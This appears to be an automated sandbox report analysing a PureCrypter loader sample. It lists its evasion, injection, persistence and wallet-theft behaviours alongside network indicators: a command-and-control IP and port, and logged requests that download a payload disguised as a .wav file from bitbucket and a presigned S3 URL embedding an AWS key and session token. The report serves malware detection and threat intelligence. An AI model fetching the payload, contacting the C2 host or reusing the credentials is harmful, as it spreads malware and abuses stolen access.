Edit tour

Windows Analysis Report
hvnc-CR-SCR-0710.bin.exe

Overview

General Information

Sample name:	hvnc-CR-SCR-0710.bin.exe
Analysis ID:	1532602
MD5:	177136a947a8677c09fc4c9891b18dde
SHA1:	cc5dbbaa959a97603e6a647e25f7de47777cc6c3
SHA256:	adbca36fa3dab9cbc2ba34e3343c2cb6726ea5ef0064b293a01a1f396a454264
Tags:	exehvncuser-01Xyris
Infos:

Detection

PureCrypter

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code contains very large strings

AI detected suspicious sample

Detected PureCrypter Trojan

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

hvnc-CR-SCR-0710.bin.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe" MD5: 177136A947A8677C09FC4C9891B18DDE)

InstallUtil.exe (PID: 3244 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

msql2.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Roaming\msql2.exe" MD5: 177136A947A8677C09FC4C9891B18DDE)

InstallUtil.exe (PID: 3384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

msql2.exe (PID: 5356 cmdline: "C:\Users\user\AppData\Roaming\msql2.exe" MD5: 177136A947A8677C09FC4C9891B18DDE)

InstallUtil.exe (PID: 1816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1745104377.00000000065F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 3244	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 3244	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: msql2.exe PID: 2140	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: msql2.exe PID: 2140	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 3384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msql2.exe PID: 5356	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: msql2.exe PID: 5356	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.hvnc-CR-SCR-0710.bin.exe.65f0000.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\msql2.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe, ProcessId: 7164, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msql2

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T18:15:10.553784+0200	2035595	1	Domain Observed Used for C2 Detected	31.41.244.211	56001	192.168.2.4	49732	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\msql2.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\msql2.exe	Virustotal: Detection: 34%			Perma Link

Multi AV Scanner detection for submitted file

Source: hvnc-CR-SCR-0710.bin.exe	ReversingLabs: Detection: 26%
Source: hvnc-CR-SCR-0710.bin.exe	Virustotal: Detection: 34%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\msql2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hvnc-CR-SCR-0710.bin.exe

Joe Sandbox ML: detected

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.30.95:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.90.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.232.1:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: hvnc-CR-SCR-0710.bin.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then mov eax, dword ptr [ebp-30h]	0_2_064E0168
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_064E11D8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	0_2_064E11D0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then jmp 064F4EB1h	0_2_064F4E50
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then jmp 064FCEE8h	0_2_064FCE28
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then jmp 064FCEE8h	0_2_064FCE30
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then jmp 064F4388h	0_2_064F42F0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then jmp 064F4388h	0_2_064F4300
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then jmp 064F4EB1h	0_2_064F502C
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_0651D428
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then mov eax, dword ptr [ebp-30h]	2_2_060E0168
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	2_2_060E11D8
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	2_2_060E11D0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060F4EB1h	2_2_060F4E17
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060FCEE8h	2_2_060FCE28
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060FCEE8h	2_2_060FCE30
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060F4EB1h	2_2_060F4E50
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060F4388h	2_2_060F42F0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060F4388h	2_2_060F4300
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 060F4EB1h	2_2_060F502C
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_0611D428
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	5_2_06AE11D8
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h	5_2_06AE11D0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then mov eax, dword ptr [ebp-30h]	5_2_06AE0168
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AFCEE8h	5_2_06AFCE28
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AFCEE8h	5_2_06AFCE30
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AF4EB1h	5_2_06AF4E17
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AF4EB1h	5_2_06AF4E50
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AF4388h	5_2_06AF42F0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AF4388h	5_2_06AF4300
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then jmp 06AF4EB1h	5_2_06AF502C
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	5_2_06B1D428

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 31.41.244.211:56001 -> 192.168.2.4:49732

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 31.41.244.211:56001

Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.166.143.49 185.166.143.49

Source: Joe Sandbox View

ASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.211

Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
